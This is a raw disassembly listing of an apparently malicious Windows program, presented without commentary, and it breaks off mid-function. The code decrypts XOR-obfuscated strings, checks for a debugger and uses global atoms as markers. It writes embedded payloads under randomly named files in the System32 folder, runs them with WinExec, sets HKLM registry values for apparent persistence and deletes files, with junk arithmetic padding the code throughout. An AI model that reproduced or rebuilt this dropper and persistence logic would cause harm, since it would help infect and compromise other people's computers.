lea esi, aR6 ; "R6"
mov ecx, 3
rep movsb
call sub_40C574 ; GetProcessHeap
lea eax, [ebp+var_105]
push eax
push [ebp+arg_0]
call sub_403383
call sub_40C598 ; GetTickCount
push 2
push offset word_446666
call sub_4032E7
push eax
lea edi, [ebp+var_105]
push edi
call sub_40CA54
add esp, 18h
mov [ebp+var_108], 1D40h
add [ebp+var_108], 6FD4h
loc_403545: ; CODE XREF: sub_4034D8+9E�j
lea eax, [ebp+var_105]
push eax
call sub_40C5EC ; GlobalFindAtomA
mov edi, eax
mov [ebp+var_10A], di
cmp [ebp+var_10A], 0
jz short loc_403578
movzx eax, [ebp+var_10A]
push eax
call sub_40C5E0 ; GlobalDeleteAtom
call sub_40C598 ; GetTickCount
jmp short loc_403545
; ---------------------------------------------------------------------------
loc_403578: ; CODE XREF: sub_4034D8+8A�j
pop edi
pop esi
leave
retn
sub_4034D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40357C proc near ; CODE XREF: sub_403610+A1�p
; sub_4036F2+37�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 1D8h
push esi
push [ebp+arg_0]
mov eax, dword_43C17C
lea eax, ds:40E110h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4035C1
; ---------------------------------------------------------------------------
loc_4035AA: ; CODE XREF: sub_40357C+47�j
mov eax, dword_43C17C
add eax, edi
lea eax, ds:40E110h[eax]
movsx edx, byte ptr [eax]
xor edx, 4Eh
mov [eax], dl
inc edi
loc_4035C1: ; CODE XREF: sub_40357C+2C�j
cmp edi, esi
jl short loc_4035AA
mov [ebp+var_8], 1C3h
mov eax, dword_43C17C
add eax, esi
mov byte ptr ds:dword_40E110[eax], 0
mov edi, dword_43C17C
mov eax, edi
add eax, 2
add eax, esi
mov dword_43C17C, eax
inc dword_43C17C
cmp dword_43C17C, 0E02h
jle short loc_403606
and dword_43C17C, 0
loc_403606: ; CODE XREF: sub_40357C+81�j
lea eax, dword_40E110[edi]
pop edi
pop esi
leave
retn
sub_40357C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403610 proc near ; CODE XREF: sub_4036F2+44�p
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_38], 579Dh
add [ebp+var_38], 917h
mov ax, word_43C180
mov [ebp+var_3A], ax
mov esi, 2C6Bh
mov eax, esi
add eax, esi
mov esi, eax
mov eax, 0Dh
sub eax, dword_43C178
push eax
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_40C9A0
add esp, 0Ch
call sub_40C514 ; GetCurrentThreadId
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_403663: ; CODE XREF: sub_403610+58�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403663
mov ebx, eax
mov [ebp+var_2], bl
call sub_40C538 ; RtlGetLastWin32Error
mov [ebp+var_1], 0
jmp short loc_403690
; ---------------------------------------------------------------------------
loc_40367A: ; CODE XREF: sub_403610+8A�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_403690: ; CODE XREF: sub_403610+68�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_40367A
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_4036C4
; ---------------------------------------------------------------------------
loc_4036AA: ; CODE XREF: sub_403610+C5�j
push 1
push offset byte_446664
call sub_40357C
push eax
push edi
call sub_40CA54
add esp, 10h
add [ebp+var_3], 1
loc_4036C4: ; CODE XREF: sub_403610+98�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_4036AA
call sub_40C5A4 ; GetVersion
push [ebp+arg_8]
push edi
call sub_40CA54
add esp, 8
call sub_40C538 ; RtlGetLastWin32Error
pop edi
pop esi
pop ebx
leave
retn
sub_403610 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036F2 proc near ; CODE XREF: sub_40A766+671�p
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
lea edi, [ebp+var_35]
lea esi, word_43C182
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+var_2], 891h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
push 1
push offset word_446662
call sub_40357C
push eax
lea edi, [ebp+var_34]
push edi
push [ebp+arg_0]
call sub_403610
add esp, 14h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_34]
push eax
call sub_40C5D4 ; GlobalAddAtomA
mov ebx, 3324h
sub ebx, 3885h
pop edi
pop esi
pop ebx
leave
retn
sub_4036F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40375C proc near ; CODE XREF: sub_4037EF+47�p
; .text:004038C7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 6Ch
push esi
push [ebp+arg_0]
mov eax, dword_43C18C
lea eax, ds:40F780h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4037A1
; ---------------------------------------------------------------------------
loc_40378A: ; CODE XREF: sub_40375C+47�j
mov eax, dword_43C18C
add eax, edi
lea eax, ds:40F780h[eax]
movsx edx, byte ptr [eax]
xor edx, 7
mov [eax], dl
inc edi
loc_4037A1: ; CODE XREF: sub_40375C+2C�j
cmp edi, esi
jl short loc_40378A
mov eax, dword_43C18C
add eax, esi
mov byte ptr ds:dword_40F780[eax], 0
xor edi, edi
mov edi, dword_43C18C
inc dword_43C18C
mov eax, dword_43C18C
lea eax, [eax+esi+6]
mov dword_43C18C, eax
cmp eax, 0DE8h
jle short loc_4037DE
and dword_43C18C, 0
loc_4037DE: ; CODE XREF: sub_40375C+79�j
mov [ebp+var_8], 0FFh
lea eax, dword_40F780[edi]
pop edi
pop esi
leave
retn
sub_40375C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037EF proc near ; CODE XREF: sub_40A766+719�p
; sub_40A766+74F�p
var_10A = word ptr -10Ah
var_108 = byte ptr -108h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
call sub_40C514 ; GetCurrentThreadId
lea edi, [ebp+var_108]
lea esi, byte_43C190
mov ecx, 3
rep movsb
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call sub_40CA30
mov ax, word_43C193
mov [ebp+var_10A], ax
push 1
push offset asc_446660 ; "$"
call sub_40375C
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CA54
mov ebx, 20A5h
sub ebx, 7EDBh
push [ebp+arg_4]
lea eax, [ebp+var_104]
push eax
call sub_40CA54
add esp, 20h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_104]
push eax
call sub_40C5D4 ; GlobalAddAtomA
mov [ebp+var_105], 4Eh
add [ebp+var_105], 55h
pop edi
pop esi
pop ebx
leave
retn
sub_4037EF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10Ch
push esi
push edi
call sub_40C574 ; GetProcessHeap
lea edi, [ebp-10Bh]
lea esi, aH8me ; "H8mE"
mov ecx, 5
rep movsb
call sub_40C598 ; GetTickCount
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push eax
call sub_40CA30
push 1
push offset asc_446660 ; "$"
call sub_40375C
push eax
lea edi, [ebp-104h]
push edi
call sub_40CA54
call sub_40C634 ; IsDebuggerPresent
push dword ptr [ebp+0Ch]
lea eax, [ebp-104h]
push eax
call sub_40CA54
add esp, 20h
call sub_40C5A4 ; GetVersion
loc_4038F5: ; CODE XREF: .text:00403930�j
lea eax, [ebp-104h]
push eax
call sub_40C5EC ; GlobalFindAtomA
mov edi, eax
mov [ebp-106h], di
call sub_40C514 ; GetCurrentThreadId
cmp word ptr [ebp-106h], 0
jz short loc_403932
call sub_40C508 ; GetCurrentProcessId
movzx eax, word ptr [ebp-106h]
push eax
call sub_40C5E0 ; GlobalDeleteAtom
call sub_40C514 ; GetCurrentThreadId
jmp short loc_4038F5
; ---------------------------------------------------------------------------
loc_403932: ; CODE XREF: .text:00403917�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403936 proc near ; CODE XREF: sub_4039D6+8B�p
; sub_403AA3+73�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 20Eh
push esi
push [ebp+arg_0]
mov eax, dword_43C1A4
lea eax, ds:41DA90h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_8], 331h
xor edi, edi
jmp short loc_403985
; ---------------------------------------------------------------------------
loc_40396B: ; CODE XREF: sub_403936+51�j
mov eax, dword_43C1A4
add eax, edi
lea eax, ds:41DA90h[eax]
movsx edx, byte ptr [eax]
xor edx, 8Fh
mov [eax], dl
inc edi
loc_403985: ; CODE XREF: sub_403936+33�j
cmp edi, esi
jl short loc_40396B
mov eax, dword_43C1A4
add eax, esi
mov byte ptr ds:dword_41DA90[eax], 0
mov edi, dword_43C1A4
inc dword_43C1A4
mov eax, dword_43C1A4
lea eax, [eax+esi+6]
mov dword_43C1A4, eax
add dword_43C1A4, 2
cmp dword_43C1A4, 0DFDh
jle short loc_4039CC
and dword_43C1A4, 0
loc_4039CC: ; CODE XREF: sub_403936+8D�j
lea eax, dword_41DA90[edi]
pop edi
pop esi
leave
retn
sub_403936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039D6 proc near ; CODE XREF: sub_403AA3+49�p
; sub_403C5F+155�p ...
var_1013 = byte ptr -1013h
var_100B = byte ptr -100Bh
var_1008 = dword ptr -1008h
var_1003 = byte ptr -1003h
var_1000 = byte ptr -1000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1014h
call sub_40C498
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_100B]
lea esi, word_4411CA
mov ecx, 3
rep movsb
push 0FFFh
lea eax, [ebp+var_1003]
push eax
call sub_40C580 ; GetSystemDirectoryA
mov [ebp+var_1000], 0
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1008]
push eax
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_1003]
push eax
call sub_40C5BC ; GetVolumeInformationA
lea edi, [ebp+var_1013]
lea esi, aK0iJ ; " K0i=J "
movsd
movsd
push 4
push offset aK ; ""
call sub_403936
push [ebp+var_1008]
push eax
push ebx
call sub_40CA30
add esp, 14h
and [ebp+var_4], 0
loc_403A7A: ; CODE XREF: sub_4039D6+C1�j
mov eax, [ebp+var_4]
mov al, [ebx+eax]
cmp al, 41h
jge short loc_403A90
cmp al, 30h
jle short loc_403A90
mov eax, [ebp+var_4]
add eax, ebx
add byte ptr [eax], 11h
loc_403A90: ; CODE XREF: sub_4039D6+AC�j
; sub_4039D6+B0�j
inc [ebp+var_4]
cmp [ebp+var_4], 8
jb short loc_403A7A
call sub_40C5A4 ; GetVersion
pop edi
pop esi
pop ebx
leave
retn
sub_4039D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AA3 proc near ; CODE XREF: sub_40A766+7E8�p
var_290 = dword ptr -290h
var_28A = byte ptr -28Ah
var_283 = byte ptr -283h
var_280 = byte ptr -280h
var_27C = dword ptr -27Ch
var_278 = byte ptr -278h
var_275 = byte ptr -275h
var_26F = byte ptr -26Fh
var_16B = byte ptr -16Bh
var_107 = byte ptr -107h
var_106 = word ptr -106h
var_104 = word ptr -104h
var_102 = word ptr -102h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 290h
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_275]
lea esi, aKg7x_ ; "kg7x_"
mov ecx, 3
rep movsw
mov [ebp+var_104], 63FCh
movzx eax, [ebp+var_104]
imul eax, 3246h
mov [ebp+var_104], ax
lea eax, [ebp+var_16B]
push eax
call sub_4039D6
lea edi, [ebp+var_278]
lea esi, aOw ; "oW"
mov ecx, 3
rep movsb
mov eax, dword_4411DE
mov [ebp+var_27C], eax
push 9
push offset byte_446651
call sub_403936
lea edi, [ebp+var_16B]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA30
mov ebx, 3DFBh
mov eax, 1040h
mul ebx
mov [ebp+var_290], eax
mov ebx, eax
lea eax, [ebp+var_FF]
push eax
call sub_403449
mov [ebp+var_102], 0F5Dh
movzx eax, [ebp+var_102]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_102], ax
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_FF]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_106], 10FCh
add [ebp+var_106], 4EDCh
push 0
lea eax, [ebp+var_280]
push eax
push 3621h
push offset byte_43DBA9
push ebx
call sub_40C730 ; WriteFile
push ebx
call sub_40C55C ; CloseHandle
mov ebx, 0CDFh
add ebx, 10D0h
lea edi, [ebp+var_283]
lea esi, word_4411E2
mov ecx, 3
rep movsb
push 104h
lea eax, [ebp+var_26F]
push eax
push 0
call sub_40C544 ; GetModuleFileNameA
push 1
push offset byte_44664F
call sub_403936
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA54
lea edi, [ebp+var_28A]
lea esi, aVR ; "|+V|;R"
mov ecx, 7
rep movsb
lea eax, [ebp+var_26F]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_40CA54
add esp, 38h
push 0
lea eax, [ebp+var_FF]
push eax
call sub_40C724 ; WinExec
mov [ebp+var_107], 0F3h
movzx eax, [ebp+var_107]
imul eax, 6754h
mov [ebp+var_107], al
pop edi
pop esi
pop ebx
leave
retn
sub_403AA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C5F proc near ; CODE XREF: sub_40A766+2E7�p
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_2FF = byte ptr -2FFh
var_2FC = byte ptr -2FCh
var_2F5 = byte ptr -2F5h
var_2F4 = byte ptr -2F4h
var_2F1 = byte ptr -2F1h
var_2E9 = byte ptr -2E9h
var_2E3 = byte ptr -2E3h
var_2DE = byte ptr -2DEh
var_278 = dword ptr -278h
var_271 = byte ptr -271h
var_270 = dword ptr -270h
var_26C = word ptr -26Ch
var_26A = byte ptr -26Ah
var_269 = byte ptr -269h
var_205 = byte ptr -205h
var_101 = byte ptr -101h
var_FB = byte ptr -0FBh
var_FA = byte ptr -0FAh
var_F9 = byte ptr -0F9h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 328h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
lea edi, [ebp+var_2E3]
lea esi, aN4U ; "N4/u"
mov ecx, 5
rep movsb
mov [ebp+var_26A], 0C4h
movzx eax, [ebp+var_26A]
imul eax, 0CACh
mov [ebp+var_26A], al
push 26h
push offset dword_446628
call sub_403936
mov [ebp+var_304], eax
call sub_40CA18
mov [ebp+var_308], eax
call sub_40CA18
mov [ebp+var_30C], eax
call sub_40CA18
mov [ebp+var_310], eax
call sub_40CA18
mov [ebp+var_314], eax
call sub_40CA18
mov [ebp+var_318], eax
call sub_40CA18
mov [ebp+var_31C], eax
call sub_40CA18
mov [ebp+var_320], eax
call sub_40CA18
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_320]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_31C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_318]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_314]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_310]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_30C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_308]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_304]
push edi
lea edi, [ebp+var_269]
push edi
call sub_40CA30
call sub_40C5A4 ; GetVersion
lea edi, [ebp+var_2E9]
lea esi, aVEM ; "v e~m"
mov ecx, 3
rep movsw
lea eax, [ebp+var_2DE]
push eax
call sub_4039D6
add esp, 34h
mov ebx, 3F4Bh
sub ebx, 721Bh
lea edi, [ebp+var_2F1]
lea esi, aKPyesn ; "k&PYESN"
mov ecx, 2
rep movsd
call sub_40CA18
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_101], dl
lea edi, [ebp+var_2F4]
lea esi, aAj ; "aJ"
mov ecx, 3
rep movsb
mov [ebp+var_1], 1
jmp short loc_403E4A
; ---------------------------------------------------------------------------
loc_403E1A: ; CODE XREF: sub_403C5F+1F0�j
call sub_40CA18
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_101], dl
add [ebp+var_1], 1
loc_403E4A: ; CODE XREF: sub_403C5F+1B9�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_403E1A
mov [ebp+var_26C], 789Fh
movzx eax, [ebp+var_26C]
imul eax, 7E80h
mov [ebp+var_26C], ax
mov [ebp+var_F9], 0
call sub_40CA18
mov edx, eax
test dl, 1
jnz short loc_403EA8
call sub_40C574 ; GetProcessHeap
mov [ebp+var_FB], 33h
mov [ebp+var_324], 1F1Ah
add [ebp+var_324], 4A03h
mov [ebp+var_FA], 32h
loc_403EA8: ; CODE XREF: sub_403C5F+220�j
push 9
push offset word_44661E
call sub_403936
lea edi, [ebp+var_101]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_205]
push edi
call sub_40CA30
lea edi, [ebp+var_2F5]
lea esi, byte_441202
xor ecx, ecx
inc ecx
rep movsb
lea eax, [ebp+var_205]
push eax
call sub_403449
call sub_40C514 ; GetCurrentThreadId
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_205]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_270], 1D0Fh
inc [ebp+var_270]
push [ebp+arg_0]
mov eax, offset aMjanfj32 ; "Mjanfj32"
push eax
call sub_40CA30
push 0
lea eax, [ebp+var_2FC]
push eax
push 1A01h
push offset dword_43C1A8
push ebx
call sub_40C730 ; WriteFile
lea edi, [ebp+var_2FF]
lea esi, byte_441203
mov ecx, 3
rep movsb
push ebx
call sub_40C55C ; CloseHandle
call sub_40C634 ; IsDebuggerPresent
push 17h
push offset word_446606
call sub_403936
lea edi, [ebp+var_269]
push edi
push eax
lea edi, [ebp+var_101]
push edi
call sub_40CA30
mov [ebp+var_271], 81h
add [ebp+var_271], 1
lea eax, [ebp+var_205]
push eax
push offset byte_446605
lea eax, [ebp+var_101]
push eax
push 80000000h
call sub_40404B
mov [ebp+var_278], 2820h
mov eax, 260Ch
mul [ebp+var_278]
mov [ebp+var_324], eax
mov [ebp+var_278], eax
push 0Eh
push offset word_4465F6
call sub_403936
mov [ebp+var_328], eax
push 9
push offset dword_4465EC
call sub_403936
push eax
mov edi, [ebp+var_328]
push edi
lea edi, [ebp+var_101]
push edi
push 80000000h
call sub_40404B
call sub_40C598 ; GetTickCount
push 45h
push offset word_4465A6
loc_404010: ; DATA XREF: .data:0043E139�w
; .data:0043E153�w ...
call sub_403936
lea edi, [ebp+var_269]
push edi
sub_403C5F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40401C proc near ; DATA XREF: .data:0043E1CD�o
; .data:0043E21C�r
lea edi, [ebp-2DEh]
push edi
push eax
sub_40401C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404024 proc near ; DATA XREF: .data:0043E201�o
; .data:0043E216�r ...
push 80000002h
call sub_40404B ; DATA XREF: .data:loc_43E1A1�r
; .data:loc_43E1B1�r
add esp, 80h ; DATA XREF: .data:0043E0A5�w
loc_404034: ; DATA XREF: .data:0043E0AF�w
; .data:0043E0CA�r ...
mov word ptr [ebp-27Ah], 2967h
sub word ptr [ebp-27Ah], 716Eh
pop edi
pop esi
pop ebx
leave
retn
sub_404024 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40404B proc near ; CODE XREF: sub_403C5F+348�p
; sub_403C5F+3A0�p ...
var_17 = byte ptr -17h
var_F = byte ptr -0Fh
var_C = byte ptr -0Ch
var_6 = word ptr -6
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_6], 396Fh
sub [ebp+var_6], 2933h
inc dword_43B228
lea edi, [ebp+var_F]
lea esi, word_441206
mov ecx, 3
rep movsb
lea edi, [ebp+var_17]
lea esi, aUs6arh ; " US6rH"
movsd
movsd
and [ebp+var_4], 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
loc_40408C: ; DATA XREF: .data:0043E054�w
push eax
push 0
push 0F003Fh ; DATA XREF: .data:0043E059�w
; .data:0043E075�w
loc_404094: ; DATA XREF: .data:0043E5B4�w
; .data:0043E5BA�r ...
push 0
push 0
sub_40404B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404098 proc near ; DATA XREF: .data:loc_43E4BD�o
; .data:0043E519�o ...
push 0
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40C91C ; RegCreateKeyExA
call sub_40C5A4 ; GetVersion
sub_404098 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4040AA proc near ; DATA XREF: sub_43E630+C�o
mov eax, [ebp+14h]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4040B2: ; CODE XREF: sub_4040AA+D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4040B2
mov [ebp-0Ch], eax ; DATA XREF: sub_43E630+1C�o
call sub_40C634 ; IsDebuggerPresent
push dword ptr [ebp-0Ch]
push dword ptr [ebp+14h]
push 1
push 0
push dword ptr [ebp+10h]
push dword ptr [ebp-4]
call sub_40C94C ; RegSetValueExA
call sub_40C574 ; GetProcessHeap
push dword ptr [ebp-4]
call sub_40C928 ; RegCloseKey
mov ebx, 4DD8h
mov eax, 4D1Ah
mul ebx
mov [ebp-1Ch], eax
mov eax, [ebp-1Ch]
mov ebx, eax
pop edi
pop esi
pop ebx
leave
retn
sub_4040AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040FC proc near ; CODE XREF: sub_404194+FE�p
; sub_404194+11E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_44121C
lea eax, ds:411DB0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_40413C
; ---------------------------------------------------------------------------
loc_404122: ; CODE XREF: sub_4040FC+42�j
mov eax, dword_44121C
add eax, edi
lea eax, ds:411DB0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0ADh
mov [eax], dl
inc edi
loc_40413C: ; CODE XREF: sub_4040FC+24�j
cmp edi, esi
jl short loc_404122
mov [ebp+var_4], 1A7h
mov eax, dword_44121C
add eax, esi
mov byte ptr ds:dword_411DB0[eax], 0
mov edi, dword_44121C
add dword_44121C, 2
mov eax, dword_44121C
lea eax, [eax+esi+2]
mov dword_44121C, eax
inc dword_44121C
cmp dword_44121C, 0DB6h
jle short loc_40418A
and dword_44121C, 0
loc_40418A: ; CODE XREF: sub_4040FC+85�j
lea eax, dword_411DB0[edi]
pop edi
pop esi
leave
retn
sub_4040FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404194 proc near ; CODE XREF: sub_40A766+33D�p
var_14BA = byte ptr -14BAh
var_14B3 = byte ptr -14B3h
var_14B2 = byte ptr -14B2h
var_14AC = byte ptr -14ACh
var_14A7 = byte ptr -14A7h
var_14A4 = byte ptr -14A4h
var_149C = byte ptr -149Ch
var_1499 = byte ptr -1499h
var_1496 = byte ptr -1496h
var_1397 = byte ptr -1397h
var_1396 = byte ptr -1396h
var_1395 = byte ptr -1395h
var_1394 = dword ptr -1394h
var_1384 = dword ptr -1384h
var_1300 = byte ptr -1300h
var_1201 = byte ptr -1201h
var_1102 = word ptr -1102h
var_10FF = byte ptr -10FFh
var_10FE = byte ptr -10FEh
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
mov eax, 14BCh
call sub_40C498
push ebx
push esi
push edi
mov [ebp+var_10FF], 5Ah
movzx eax, [ebp+var_10FF]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_10FF], al
lea edi, [ebp+var_1499]
lea esi, byte_441220
mov ecx, 3
rep movsb
lea edi, [ebp+var_149C]
lea esi, byte_441223
mov ecx, 3
rep movsb
push 0FFh
lea eax, [ebp+var_1300]
push eax
push 0
call sub_40C544 ; GetModuleFileNameA
mov ebx, 2910h
inc ebx
mov [ebp+var_1394], 94h
mov [ebp+var_1102], 6834h
movzx eax, [ebp+var_1102]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1102], ax
lea eax, [ebp+var_1394]
push eax
call sub_40C5B0 ; GetVersionExA
mov [ebp+var_1395], 0B9h
add [ebp+var_1395], 1
lea edi, [ebp+var_14A4]
lea esi, aNb_ya ; "%&nb.ya"
movsd
movsd
cmp [ebp+var_1384], 2
jnz loc_4042E9
mov [ebp+var_14B3], 0DCh
add [ebp+var_14B3], 90h
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C580 ; GetSystemDirectoryA
lea edi, [ebp+var_14BA]
lea esi, a@p ; " $~@p"
mov ecx, 7
rep movsb
push 0Fh
push offset word_446596
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1201]
push edi
call sub_40CA30
push 0Ah
push offset byte_44658B
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1496]
push edi
call sub_40CA30
push 8
push offset word_446582
call sub_4040FC
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA54
add esp, 38h
jmp short loc_404365
; ---------------------------------------------------------------------------
loc_4042E9: ; CODE XREF: sub_404194+BF�j
call sub_40C574 ; GetProcessHeap
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C5C8 ; GetWindowsDirectoryA
call sub_40C598 ; GetTickCount
push 0Fh
push offset word_446572
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1201]
push edi
call sub_40CA30
call sub_40C5A4 ; GetVersion
push 0Eh
push offset byte_446563
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1496]
push edi
call sub_40CA30
push 0Ch
push offset word_446556
call sub_4040FC
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA54
add esp, 38h
loc_404365: ; CODE XREF: sub_404194+153�j
lea eax, [ebp+var_1496]
push eax
call sub_40C760 ; DeleteFileA
call sub_40C598 ; GetTickCount
lea edi, [ebp+var_14A7]
lea esi, aP ; " p"
mov ecx, 3
rep movsb
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_1201]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
lea edi, [ebp+var_14B2]
lea esi, aVk_0 ; " vK%;"
mov ecx, 3
rep movsw
push 39h
push offset aCAzaNiUAzaNNiN ; "ݠޓˍٍލ"...
call sub_4040FC
lea edi, [ebp+var_1201]
push edi
lea edi, [ebp+var_1300]
push edi
